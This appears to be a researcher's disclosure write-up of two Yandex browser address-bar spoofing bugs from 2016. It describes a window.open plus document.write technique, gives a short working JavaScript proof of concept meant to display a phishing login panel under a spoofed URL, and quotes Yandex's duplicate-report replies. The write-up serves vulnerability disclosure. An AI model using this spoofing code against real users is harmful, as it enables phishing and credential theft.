Disclaimer: both vulnerabilities were reported to the Yandex Security Team and considered as dupes, so, I was not the first one who discovered them.
This issue was reported 19th July, 2016, 21:36
By making an user visit a page controlled by the attacker and using window.open
and document.write
functions, it was possible to spoof the URL that is shown.
Workflow:
- Once the page loads, a function is triggered. In my PoC, the function was triggered when a button is clicked.
- The function opens a new window by using
window.open
pointing to the URL that is going to be spoofed.- By calling to
document.write
to that new window, we write a script that calls again todocument.write
and writes the content, usually this content will be a phising login panel. - My PoC used document.location in order to help them to know the real location insted of the one that the Address Bar was showing.
So, the final code would be:
<script>
function spoof() {
nWindow = window.open('https:/www.google.com', '_t1');
nWindow.document.write('<pre>Here we could place a phising login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
The page is being hosted in my server
Final email about this vulnerability was:
Hello!Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.
Have a nice day!
--
Vasiliy Kuznetsov Yandex Security Team
This issue was reported 19th July, 2016, 18:41
The workflow is exactly the same again.
Before running the PoC:
![ResultMobile1](http://i.imgur.com/jDPQ1mp.jpg)
After running the PoC:
![ResultMobile2](http://i.imgur.com/yOQKHwH.jpg)
Final emails about this vulnerability were:
Hello, Miguel Ángel!As for Android, I'll check it shortly because it look similar to one report we got the other day. I'll let you know in a few days.
Have a great weekend!
Hello, Miguel Ángel!I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.
I hope you've enjoyed this write up.
If you're the one who reported this vulnerabilities before me and you want me to remove this post, please, send me a message via Twitter
Kind regards!